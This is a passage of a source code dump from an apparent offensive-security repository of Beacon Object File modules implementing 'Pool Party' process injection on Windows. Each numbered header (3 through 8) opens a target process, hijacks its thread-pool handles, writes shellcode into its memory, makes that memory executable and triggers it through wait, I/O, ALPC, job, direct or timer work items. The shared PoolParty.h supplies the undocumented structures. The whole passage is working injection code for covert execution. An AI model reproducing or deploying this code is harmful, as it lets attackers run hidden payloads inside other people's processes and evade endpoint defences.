    _ZwAssociateWaitCompletionPacket ZwAssociateWaitCompletionPacket = (_ZwAssociateWaitCompletionPacket)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "ZwAssociateWaitCompletionPacket"));
    _NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory"));

    MSVCRT$srand((unsigned int)MSVCRT$time(NULL));
	wchar_t* POOL_PARTY_EVENT_NAME = generateRandomLettersW(7);

    PFULL_TP_WAIT pTpWait = KERNEL32$CreateThreadpoolWait((PTP_WAIT_CALLBACK)pShellcodeAddress, NULL, NULL);
    
    PFULL_TP_WAIT pRemoteTpWait = (PFULL_TP_WAIT)KERNEL32$VirtualAllocEx(hTarget, NULL, sizeof(FULL_TP_WAIT), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    NtWriteVirtualMemory(hTarget, pRemoteTpWait, pTpWait, sizeof(FULL_TP_WAIT), NULL);

    PTP_DIRECT pRemoteTpDirect = (PTP_DIRECT)KERNEL32$VirtualAllocEx(hTarget, NULL, sizeof(TP_DIRECT), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    NtWriteVirtualMemory(hTarget, pRemoteTpDirect, &pTpWait->Direct, sizeof(TP_DIRECT), NULL);

    HANDLE hEvent = KERNEL32$CreateEventW(NULL, FALSE, FALSE, (LPCWSTR)POOL_PARTY_EVENT_NAME);
    BeaconPrintf(CALLBACK_OUTPUT, "Pool party event created with name: %s", POOL_PARTY_EVENT_NAME);
    ZwAssociateWaitCompletionPacket(pTpWait->WaitPkt, hIoCompletion, hEvent, pRemoteTpDirect, pRemoteTpWait, 0, 0, NULL);

    KERNEL32$SetEvent(hEvent);

}

void Inject3(DWORD dwTargetProcessId, CHAR* shellcode, SIZE_T shellcodeSize) {
    _NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory"));
    
    HANDLE hTarget = NULL;
    DWORD dwOldProtect = NULL;
    hTarget = KERNEL32$OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION, FALSE, dwTargetProcessId);
    
    if (hTarget != NULL) {
        HijackIoCompletionHandle(hTarget, IO_COMPLETION_ALL_ACCESS);
        
        PVOID pShellcodeAddress = KERNEL32$VirtualAllocEx(hTarget, NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        NtWriteVirtualMemory(hTarget, pShellcodeAddress, shellcode, shellcodeSize, NULL);
        KERNEL32$VirtualProtectEx(hTarget, pShellcodeAddress, shellcodeSize, PAGE_EXECUTE_READ, &dwOldProtect);
        
        RemoteTpWaitInsertion(hTarget, pShellcodeAddress);
    } else { 
        BeaconPrintf(CALLBACK_OUTPUT, "PID %d inaccessible", dwTargetProcessId);
    }
}

================================================
FILE: Injection-BOF/inject_poolparty/4.h
================================================
#include "PoolParty.h"

#define POOL_PARTY_POEM "Dive right in and make a splash,\n" \
                        "We're throwing a pool party in a flash!\n" \
                        "Bring your swimsuits and sunscreen galore,\n" \
                        "We'll turn up the heat and let the good times pour!\n"

void RemoteTpIoInsertionSetupExecution(HANDLE hTarget, LPVOID pShellcodeAddress) {
        _NtSetInformationFile ZwSetInformationFile = (_NtSetInformationFile)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtSetInformationFile"));
        MSVCRT$srand((unsigned int)MSVCRT$time(NULL));

        wchar_t* POOL_PARTY_FILE_NAME = generateRandomLettersW(7);
        HANDLE hFile = KERNEL32$CreateFileW(
                POOL_PARTY_FILE_NAME,
                GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE,
                NULL,
                CREATE_ALWAYS,
                FILE_ATTRIBUTE_HIDDEN | FILE_FLAG_OVERLAPPED | FILE_FLAG_DELETE_ON_CLOSE,
                NULL);

        PFULL_TP_IO pTpIo = (PFULL_TP_IO)KERNEL32$CreateThreadpoolIo(hFile, (PTP_WIN32_IO_CALLBACK)(pShellcodeAddress), NULL, NULL);

        /* Not sure why this field is not filled by CreateThreadpoolIo, need to analyze */
        pTpIo->CleanupGroupMember.Callback = pShellcodeAddress;

        ++pTpIo->PendingIrpCount;

        PFULL_TP_IO pRemoteTpIo = (PFULL_TP_IO)(KERNEL32$VirtualAllocEx(hTarget, NULL, sizeof(FULL_TP_IO), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE));
        KERNEL32$WriteProcessMemory(hTarget, pRemoteTpIo, pTpIo, sizeof(FULL_TP_IO), NULL);

        IO_STATUS_BLOCK IoStatusBlock = { 0 };
        FILE_COMPLETION_INFORMATION FileIoCopmletionInformation = { 0 };
        FileIoCopmletionInformation.Port = hIoCompletion;
        FileIoCopmletionInformation.Key = &pRemoteTpIo->Direct;
        ZwSetInformationFile(hFile, &IoStatusBlock, &FileIoCopmletionInformation, sizeof(FILE_COMPLETION_INFORMATION), r_FileReplaceCompletionInformation);

        const char* Buffer = POOL_PARTY_POEM;
        SIZE_T BufferLength = sizeof(Buffer);
        OVERLAPPED Overlapped = { 0 };
        KERNEL32$WriteFile(hFile, Buffer, BufferLength, NULL, &Overlapped);
        KERNEL32$CloseHandle(hFile);
}

void Inject4(DWORD dwTargetProcessId, CHAR* shellcode, SIZE_T shellcodeSize) {
        _NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory"));

        HANDLE hTarget = NULL;
        DWORD dwOldProtect = NULL;
        hTarget = KERNEL32$OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION, FALSE, dwTargetProcessId);

        if (hTarget) {
                HijackIoCompletionHandle(hTarget, IO_COMPLETION_ALL_ACCESS);

                PVOID pShellcodeAddress = KERNEL32$VirtualAllocEx(hTarget, NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
                NtWriteVirtualMemory(hTarget, pShellcodeAddress, shellcode, shellcodeSize, NULL);
                KERNEL32$VirtualProtectEx(hTarget, pShellcodeAddress, shellcodeSize, PAGE_EXECUTE_READ, &dwOldProtect);

                RemoteTpIoInsertionSetupExecution(hTarget, pShellcodeAddress);
        } else {
                BeaconPrintf(CALLBACK_OUTPUT, "PID %d inaccessible", dwTargetProcessId);
        }
}

================================================
FILE: Injection-BOF/inject_poolparty/5.h
================================================
#include "PoolParty.h"

#define POOL_PARTY_ALPC_PORT_NAME_PREFIX L"\\RPC Control\\"
#define PORT_NAME_LENGTH 9
#define POOL_PARTY_POEM "Dive right in and make a splash,\n" \
                        "We're throwing a pool party in a flash!\n" \
                        "Bring your swimsuits and sunscreen galore,\n" \
                        "We'll turn up the heat and let the good times pour!\n"

void RemoteTpAlpcInsertionSetupExecution(HANDLE hTarget, LPVOID pShellcodeAddress) {
        _NtAlpcCreatePort NtAlpcCreatePort = (_NtAlpcCreatePort)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAlpcCreatePort"));
        _TpAllocAlpcCompletion TpAllocAlpcCompletion = (_TpAllocAlpcCompletion)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "TpAllocAlpcCompletion"));
        _NtAlpcSetInformation NtAlpcSetInformation = (_NtAlpcSetInformation)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAlpcSetInformation"));
        _NtAlpcConnectPort NtAlpcConnectPort = (_NtAlpcConnectPort)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAlpcConnectPort"));

        MSVCRT$srand((unsigned int)MSVCRT$time(NULL));
        wchar_t* randomLetters = generateRandomLettersW(PORT_NAME_LENGTH);
        size_t prefixLength = MSVCRT$wcslen(POOL_PARTY_ALPC_PORT_NAME_PREFIX);
        size_t totalLength = prefixLength + PORT_NAME_LENGTH + 1;
        wchar_t* portName = (wchar_t*)MSVCRT$malloc((MSVCRT$wcslen(POOL_PARTY_ALPC_PORT_NAME_PREFIX) + PORT_NAME_LENGTH + 1) * sizeof(wchar_t));
        MSVCRT$wcscpy_s(portName, totalLength, POOL_PARTY_ALPC_PORT_NAME_PREFIX);
        MSVCRT$wcscat_s(portName, totalLength, randomLetters);
        wchar_t* POOL_PARTY_ALPC_PORT_NAME = portName;

        HANDLE hTempAlpcConnectionPort;
        NTSTATUS Ntstatus = NtAlpcCreatePort(&hTempAlpcConnectionPort, NULL, NULL);

        PFULL_TP_ALPC pTpAlpc = { 0 };
        Ntstatus = TpAllocAlpcCompletion(&pTpAlpc, hTempAlpcConnectionPort, (PTP_ALPC_CALLBACK)(pShellcodeAddress), NULL, NULL);

        UNICODE_STRING usAlpcPortName;
        RtlInitUnicodeString(&usAlpcPortName, POOL_PARTY_ALPC_PORT_NAME);

        OBJECT_ATTRIBUTES AlpcObjectAttributes = { 0 };
        AlpcObjectAttributes.Length = sizeof(OBJECT_ATTRIBUTES);
        AlpcObjectAttributes.ObjectName = &usAlpcPortName;

        ALPC_PORT_ATTRIBUTES AlpcPortAttributes = { 0 };
        AlpcPortAttributes.Flags = 0x20000;
        AlpcPortAttributes.MaxMessageLength = 328;

        HANDLE hAlpcConnectionPort;
        Ntstatus = NtAlpcCreatePort(&hAlpcConnectionPort, &AlpcObjectAttributes, &AlpcPortAttributes);

        PFULL_TP_ALPC pRemoteTpAlpc = (PFULL_TP_ALPC)(KERNEL32$VirtualAllocEx(hTarget, NULL, sizeof(FULL_TP_ALPC), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE));
        KERNEL32$WriteProcessMemory(hTarget, pRemoteTpAlpc, pTpAlpc, sizeof(FULL_TP_ALPC), NULL);

        ALPC_PORT_ASSOCIATE_COMPLETION_PORT AlpcPortAssociateCopmletionPort = { 0 };
        AlpcPortAssociateCopmletionPort.CompletionKey = pRemoteTpAlpc;
        AlpcPortAssociateCopmletionPort.CompletionPort = hIoCompletion;
        NtAlpcSetInformation(hAlpcConnectionPort, AlpcAssociateCompletionPortInformation, &AlpcPortAssociateCopmletionPort, sizeof(ALPC_PORT_ASSOCIATE_COMPLETION_PORT));

        OBJECT_ATTRIBUTES AlpcClientObjectAttributes = { 0 };
        AlpcClientObjectAttributes.Length = sizeof(OBJECT_ATTRIBUTES);

        const char* Buffer = POOL_PARTY_POEM;
        int BufferLength = sizeof(Buffer);

        ALPC_MESSAGE ClientAlpcPortMessage = { 0 };
        ClientAlpcPortMessage.PortHeader.u1.s1.DataLength = BufferLength;
        ClientAlpcPortMessage.PortHeader.u1.s1.TotalLength = sizeof(PORT_MESSAGE) + BufferLength;
        memcpy(ClientAlpcPortMessage.PortMessage, Buffer, sizeof(ClientAlpcPortMessage.PortMessage));
        size_t szClientAlpcPortMessage = sizeof(ClientAlpcPortMessage);

        /* NtAlpcConnectPort would block forever if not used with timeout, we set timeout to 1 second */
        LARGE_INTEGER liTimeout = { 0 };
        liTimeout.QuadPart = -10000000;
        HANDLE hAlpc_;
        NtAlpcConnectPort(
                &hAlpc_,
                &usAlpcPortName,
                &AlpcClientObjectAttributes,
                &AlpcPortAttributes,
                0x20000,
                NULL,
                (PPORT_MESSAGE)&ClientAlpcPortMessage,
                &szClientAlpcPortMessage,
                NULL,
                NULL,
                &liTimeout);
}

void Inject5(DWORD dwTargetProcessId, CHAR* shellcode, SIZE_T shellcodeSize) {
        _NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory"));

        HANDLE hTarget = NULL;
        DWORD dwOldProtect = NULL;
        hTarget = KERNEL32$OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION, FALSE, dwTargetProcessId);

        if (hTarget) {
                HijackIoCompletionHandle(hTarget, IO_COMPLETION_ALL_ACCESS);
                PVOID pShellcodeAddress = KERNEL32$VirtualAllocEx(hTarget, NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
                NtWriteVirtualMemory(hTarget, pShellcodeAddress, shellcode, shellcodeSize, NULL);
                KERNEL32$VirtualProtectEx(hTarget, pShellcodeAddress, shellcodeSize, PAGE_EXECUTE_READ, &dwOldProtect);
                RemoteTpAlpcInsertionSetupExecution(hTarget, pShellcodeAddress);
        } else {
                BeaconPrintf(CALLBACK_OUTPUT, "PID %d inaccessible", dwTargetProcessId);
        }
}


================================================
FILE: Injection-BOF/inject_poolparty/6.h
================================================
#include "PoolParty.h"

#define JOB_NAME_LENGTH 8
unsigned char POOL_PARTY_JOB_NAME[JOB_NAME_LENGTH + 1];

void RemoteTpJobInsertionSetupExecution(HANDLE hTarget, LPVOID pShellcodeAddress) {
    _TpAllocJobNotification TpAllocJobNotification = (_TpAllocJobNotification)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "TpAllocJobNotification"));
    MSVCRT$srand((unsigned int)MSVCRT$time(NULL));
    
    for (int i = 0; i < JOB_NAME_LENGTH; ++i) {
        POOL_PARTY_JOB_NAME[i] = generateRandomLetter();
    }
    POOL_PARTY_JOB_NAME[JOB_NAME_LENGTH] = '\0';

    HANDLE p_hJob = KERNEL32$CreateJobObjectA(NULL, POOL_PARTY_JOB_NAME);
    if (p_hJob == NULL) {
        return;
    }

    PFULL_TP_JOB pTpJob = { 0 };
    NTSTATUS Ntstatus = TpAllocJobNotification(&pTpJob, p_hJob, pShellcodeAddress, NULL, NULL);
    if (!NT_SUCCESS(Ntstatus)) {
        return;
    }

    PFULL_TP_JOB RemoteTpJobAddress = (PFULL_TP_JOB)(KERNEL32$VirtualAllocEx(hTarget, NULL, sizeof(FULL_TP_JOB), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE));
    KERNEL32$WriteProcessMemory(hTarget, RemoteTpJobAddress, pTpJob, sizeof(FULL_TP_JOB), NULL);

    JOBOBJECT_ASSOCIATE_COMPLETION_PORT JobAssociateCopmletionPort = { 0 };
    KERNEL32$SetInformationJobObject(p_hJob, JobObjectAssociateCompletionPortInformation, &JobAssociateCopmletionPort, sizeof(JOBOBJECT_ASSOCIATE_COMPLETION_PORT));

    JobAssociateCopmletionPort.CompletionKey = RemoteTpJobAddress;
    JobAssociateCopmletionPort.CompletionPort = hIoCompletion;
    KERNEL32$SetInformationJobObject(p_hJob, JobObjectAssociateCompletionPortInformation, &JobAssociateCopmletionPort, sizeof(JOBOBJECT_ASSOCIATE_COMPLETION_PORT));

    KERNEL32$AssignProcessToJobObject(p_hJob, KERNEL32$GetCurrentProcess());
}

void Inject6(DWORD dwTargetProcessId, CHAR* shellcode, SIZE_T shellcodeSize) {
    _NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory"));
    
    HANDLE hTarget = NULL;
    DWORD dwOldProtect = NULL;
    hTarget = KERNEL32$OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION, FALSE, dwTargetProcessId);
    
    if (hTarget) {
        HijackIoCompletionHandle(hTarget, IO_COMPLETION_ALL_ACCESS);
        
        PVOID pShellcodeAddress = KERNEL32$VirtualAllocEx(hTarget, NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        NtWriteVirtualMemory(hTarget, pShellcodeAddress, shellcode, shellcodeSize, NULL);
        KERNEL32$VirtualProtectEx(hTarget, pShellcodeAddress, shellcodeSize, PAGE_EXECUTE_READ, &dwOldProtect);
        
        RemoteTpJobInsertionSetupExecution(hTarget, pShellcodeAddress);
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "PID %d inaccessible", dwTargetProcessId);
    }
}

================================================
FILE: Injection-BOF/inject_poolparty/7.h
================================================
#include "PoolParty.h"

void RemoteTpDirectInsertionSetupExecution(HANDLE hTarget, LPVOID pShellcodeAddress) {
    _NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory"));
    _ZwSetIoCompletion ZwSetIoCompletion = (_ZwSetIoCompletion)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "ZwSetIoCompletion"));

    TP_DIRECT Direct = { 0 };
    Direct.Callback = pShellcodeAddress;

    PTP_DIRECT RemoteDirectAddress = (PTP_DIRECT)(KERNEL32$VirtualAllocEx(hTarget, NULL, sizeof(TP_DIRECT), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE));
    NTSTATUS res = NtWriteVirtualMemory(hTarget, RemoteDirectAddress, &Direct, sizeof(TP_DIRECT), NULL);

    ZwSetIoCompletion(hIoCompletion, RemoteDirectAddress, 0, 0, 0);
}


void Inject7(DWORD dwTargetProcessId, CHAR* shellcode, SIZE_T shellcodeSize) {
    _NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory"));

    HANDLE hTarget = NULL;
    DWORD dwOldProtect = NULL;

    hTarget = KERNEL32$OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION, FALSE, dwTargetProcessId);
    if (hTarget) {
        HijackIoCompletionHandle(hTarget, IO_COMPLETION_ALL_ACCESS);

        PVOID pShellcodeAddress = KERNEL32$VirtualAllocEx(hTarget, NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        NtWriteVirtualMemory(hTarget, pShellcodeAddress, shellcode, shellcodeSize, NULL);
        KERNEL32$VirtualProtectEx(hTarget, pShellcodeAddress, shellcodeSize, PAGE_EXECUTE_READ, &dwOldProtect);

        RemoteTpDirectInsertionSetupExecution(hTarget, pShellcodeAddress);
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "PID %d inaccessible", dwTargetProcessId);
    }
}

================================================
FILE: Injection-BOF/inject_poolparty/8.h
================================================
#include "PoolParty.h"

void RemoteTpTimerInsertion(HANDLE hTarget, LPVOID pShellcodeAddress) {
    _NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory"));
    _NtSetTimer2 NtSetTimer2 = (_NtSetTimer2)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtSetTimer2"));

    WORKER_FACTORY_BASIC_INFORMATION WorkerFactoryInformation = GetWorkerFactoryBasicInformation();
    PFULL_TP_TIMER pTpTimer = (PFULL_TP_TIMER)KERNEL32$CreateThreadpoolTimer((PTP_TIMER_CALLBACK)(pShellcodeAddress), NULL, NULL);
    PFULL_TP_TIMER RemoteTpTimerAddress = (PFULL_TP_TIMER)(KERNEL32$VirtualAllocEx(hTarget, NULL, sizeof(FULL_TP_TIMER), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE));

    int Timeout = -10000000;
    pTpTimer->Work.CleanupGroupMember.Pool = (PFULL_TP_POOL)(WorkerFactoryInformation.StartParameter);
    pTpTimer->DueTime = Timeout;
    pTpTimer->WindowStartLinks.Key = Timeout;
    pTpTimer->WindowEndLinks.Key = Timeout;
    pTpTimer->WindowStartLinks.Children.Flink = &RemoteTpTimerAddress->WindowStartLinks.Children;
    pTpTimer->WindowStartLinks.Children.Blink = &RemoteTpTimerAddress->WindowStartLinks.Children;
    pTpTimer->WindowEndLinks.Children.Flink = &RemoteTpTimerAddress->WindowEndLinks.Children;
    pTpTimer->WindowEndLinks.Children.Blink = &RemoteTpTimerAddress->WindowEndLinks.Children;

    NtWriteVirtualMemory(hTarget, RemoteTpTimerAddress, pTpTimer, sizeof(FULL_TP_TIMER), NULL);

    PVOID TpTimerWindowStartLinks = &RemoteTpTimerAddress->WindowStartLinks;
    NtWriteVirtualMemory(hTarget, &pTpTimer->Work.CleanupGroupMember.Pool->TimerQueue.AbsoluteQueue.WindowStart.Root, (PVOID)(&TpTimerWindowStartLinks), sizeof(TpTimerWindowStartLinks), NULL);

    PVOID TpTimerWindowEndLinks = &RemoteTpTimerAddress->WindowEndLinks;
    NtWriteVirtualMemory(hTarget, &pTpTimer->Work.CleanupGroupMember.Pool->TimerQueue.AbsoluteQueue.WindowEnd.Root, (PVOID)(&TpTimerWindowEndLinks), sizeof(TpTimerWindowEndLinks), NULL);

    LARGE_INTEGER ulDueTime = { 0 };
    ulDueTime.QuadPart = Timeout;
    T2_SET_PARAMETERS Parameters = { 0 };
    NtSetTimer2(hIRTimer, &ulDueTime, 0, &Parameters);
}

void Inject8(DWORD dwTargetProcessId, CHAR* shellcode, SIZE_T shellcodeSize) {
    _NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory"));

    HANDLE hTarget = NULL;
    DWORD dwOldProtect = NULL;
    hTarget = KERNEL32$OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION, FALSE, dwTargetProcessId);

    if (hTarget) {
        HijackTpWorkerFactoryHandle(hTarget, WORKER_FACTORY_ALL_ACCESS);
        HijackIRTimerHandle(hTarget, TIMER_ALL_ACCESS);

        PVOID pShellcodeAddress = KERNEL32$VirtualAllocEx(hTarget, NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        NtWriteVirtualMemory(hTarget, pShellcodeAddress, shellcode, shellcodeSize, NULL);
        KERNEL32$VirtualProtectEx(hTarget, pShellcodeAddress, shellcodeSize, PAGE_EXECUTE_READ, &dwOldProtect);

        RemoteTpTimerInsertion(hTarget, pShellcodeAddress);
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "PID %d inaccessible", dwTargetProcessId);
    }
}

================================================
FILE: Injection-BOF/inject_poolparty/PoolParty.h
================================================
#pragma once

#include <windows.h>
#include <stdint.h>
#include <stdio.h>
#include <winternl.h>

#include "beacon.h"

#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define WORKER_FACTORY_RELEASE_WORKER 0x0001
#define WORKER_FACTORY_WAIT 0x0002
#define WORKER_FACTORY_SET_INFORMATION 0x0004
#define WORKER_FACTORY_QUERY_INFORMATION 0x0008
#define WORKER_FACTORY_READY_WORKER 0x0010
#define WORKER_FACTORY_SHUTDOWN 0x0020
#define WORKER_FACTORY_ALL_ACCESS ( \
       STANDARD_RIGHTS_REQUIRED | \
       WORKER_FACTORY_RELEASE_WORKER | \
       WORKER_FACTORY_WAIT | \
       WORKER_FACTORY_SET_INFORMATION | \
       WORKER_FACTORY_QUERY_INFORMATION | \
       WORKER_FACTORY_READY_WORKER | \
       WORKER_FACTORY_SHUTDOWN \
)

WINBASEAPI BOOL         WINAPI   KERNEL32$AssignProcessToJobObject(HANDLE hJob, HANDLE hProcess);
WINBASEAPI BOOL         WINAPI   KERNEL32$DuplicateHandle(HANDLE hSourceProcessHandle, HANDLE hSourceHandle, HANDLE hTargetProcessHandle, LPHANDLE lpTargetHandle, DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwOptions);
WINBASEAPI BOOL         WINAPI   KERNEL32$ReadProcessMemory(HANDLE, LPCVOID, LPVOID, SIZE_T, SIZE_T);
WINBASEAPI BOOL         WINAPI   KERNEL32$SetEvent(HANDLE);
WINBASEAPI BOOL         WINAPI   KERNEL32$SetInformationJobObject(HANDLE hJob, JOBOBJECTINFOCLASS JobObjectInformationClass, LPVOID lpJobObjectInformation, DWORD cbJobObjectInformationLength);
WINBASEAPI BOOL         WINAPI   KERNEL32$VirtualProtectEx(HANDLE, LPVOID, SIZE_T, DWORD, PDWORD);
WINBASEAPI BOOL         WINAPI   KERNEL32$VirtualProtectEx(HANDLE, LPVOID, SIZE_T, DWORD, PDWORD);
WINBASEAPI BOOL         WINAPI   KERNEL32$WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);
WINBASEAPI BOOL         WINAPI   KERNEL32$WriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten);
WINBASEAPI HANDLE       WINAPI   KERNEL32$CloseHandle(HANDLE);
WINBASEAPI HANDLE       WINAPI   KERNEL32$CreateEventW(LPSECURITY_ATTRIBUTES, BOOL, BOOL, LPCWSTR);
WINBASEAPI HANDLE       WINAPI   KERNEL32$CreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
WINBASEAPI HANDLE       WINAPI   KERNEL32$CreateJobObjectA(LPSECURITY_ATTRIBUTES lpJobAttributes, LPCSTR lpName);
WINBASEAPI HANDLE       WINAPI   KERNEL32$GetCurrentProcess (VOID);
WINBASEAPI HANDLE       WINAPI   KERNEL32$OpenProcess (DWORD dwDesiredAccess, WINBOOL bInheritHandle, DWORD dwProcessId);
WINBASEAPI LPVOID       WINAPI   KERNEL32$VirtualAllocEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
WINBASEAPI PTP_IO       WINAPI   KERNEL32$CreateThreadpoolIo( HANDLE fl, PTP_WIN32_IO_CALLBACK pfnio, PVOID pv, PTP_CALLBACK_ENVIRON pcbe);
WINBASEAPI PTP_TIMER    WINAPI   KERNEL32$CreateThreadpoolTimer( PTP_TIMER_CALLBACK pfnti, PVOID pv, PTP_CALLBACK_ENVIRON pcbe);
WINBASEAPI PTP_WAIT     WINAPI   KERNEL32$CreateThreadpoolWait(PTP_WAIT_CALLBACK pfnwa, PVOID pv, PTP_CALLBACK_ENVIRON pcbe);
WINBASEAPI PTP_WORK     WINAPI   KERNEL32$CreateThreadpoolWork(PTP_WORK_CALLBACK, PVOID, PTP_CALLBACK_ENVIRON);

WINBASEAPI int          WINAPI   MSVCRT$rand(void);
WINBASEAPI time_t       WINAPI   MSVCRT$time(time_t *seconds);
WINBASEAPI void         WINAPI   MSVCRT$srand(unsigned int seed);
WINBASEAPI void*        WINAPI   MSVCRT$calloc(size_t number, size_t size);
WINBASEAPI void*        WINAPI   MSVCRT$malloc(size_t size);

WINBASEAPI wchar_t     *__cdecl  MSVCRT$wcscmp(const wchar_t *_lhs,const wchar_t *_rhs);
WINBASEAPI errno_t      __cdecl  MSVCRT$wcscat_s(wchar_t *_Dst, rsize_t _DstSize, const wchar_t *_Src);
WINBASEAPI errno_t      __cdecl  MSVCRT$wcscpy_s(wchar_t *_Dst, rsize_t _DstSize, const wchar_t *_Src);
WINBASEAPI void        *__cdecl  MSVCRT$realloc(void *_Memory, size_t _NewSize);
WINBASEAPI size_t       __cdecl  MSVCRT$wcslen(const wchar_t *_Str);

// Structs

typedef struct _TP_TASK_CALLBACKS
{
    void* ExecuteCallback;
    void* Unposted;
} TP_TASK_CALLBACKS, * PTP_TASK_CALLBACKS;

typedef struct _TP_TASK
{
    struct _TP_TASK_CALLBACKS* Callbacks;
    UINT32 NumaNode;
    UINT8 IdealProcessor;
    char Padding_242[3];
    struct _LIST_ENTRY ListEntry;
} TP_TASK, * PTP_TASK;

typedef struct _TPP_REFCOUNT
{
    volatile INT32 Refcount;
} TPP_REFCOUNT, * PTPP_REFCOUNT;

typedef struct _TPP_CALLER
{
    void* ReturnAddress;
} TPP_CALLER, * PTPP_CALLER;

typedef struct _TPP_PH
{
    struct _TPP_PH_LINKS* Root;
} TPP_PH, * PTPP_PH;

typedef struct _TP_DIRECT
{
    struct _TP_TASK Task;
    UINT64 Lock;
    struct _LIST_ENTRY IoCompletionInformationList;
    void* Callback;
    UINT32 NumaNode;
    UINT8 IdealProcessor;
    char __PADDING__[3];
} TP_DIRECT, * PTP_DIRECT;

typedef struct _TPP_TIMER_SUBQUEUE
{
    INT64 Expiration;
    struct _TPP_PH WindowStart;
    struct _TPP_PH WindowEnd;
    void* Timer;
    void* TimerPkt;
    struct _TP_DIRECT Direct;
    UINT32 ExpirationWindow;
    INT32 __PADDING__[1];
} TPP_TIMER_SUBQUEUE, * PTPP_TIMER_SUBQUEUE;

typedef struct _TPP_TIMER_QUEUE
{
    struct _RTL_SRWLOCK Lock;
    struct _TPP_TIMER_SUBQUEUE AbsoluteQueue;
    struct _TPP_TIMER_SUBQUEUE RelativeQueue;
    INT32 AllocatedTimerCount;
    INT32 __PADDING__[1];
} TPP_TIMER_QUEUE, * PTPP_TIMER_QUEUE;

typedef struct _TPP_NUMA_NODE
{
    INT32 WorkerCount;
} TPP_NUMA_NODE, * PTPP_NUMA_NODE;

typedef union _TPP_POOL_QUEUE_STATE
{
    union
    {
        INT64 Exchange;
        struct
        {
            INT32 RunningThreadGoal : 16;
            UINT32 PendingReleaseCount : 16;
            UINT32 QueueLength;
        };
    };
} TPP_POOL_QUEUE_STATE, * PTPP_POOL_QUEUE_STATE;

typedef struct _TPP_QUEUE
{
    struct _LIST_ENTRY Queue;
    struct _RTL_SRWLOCK Lock;
} TPP_QUEUE, * PTPP_QUEUE;

typedef struct _FULL_TP_POOL
{
    struct _TPP_REFCOUNT Refcount;
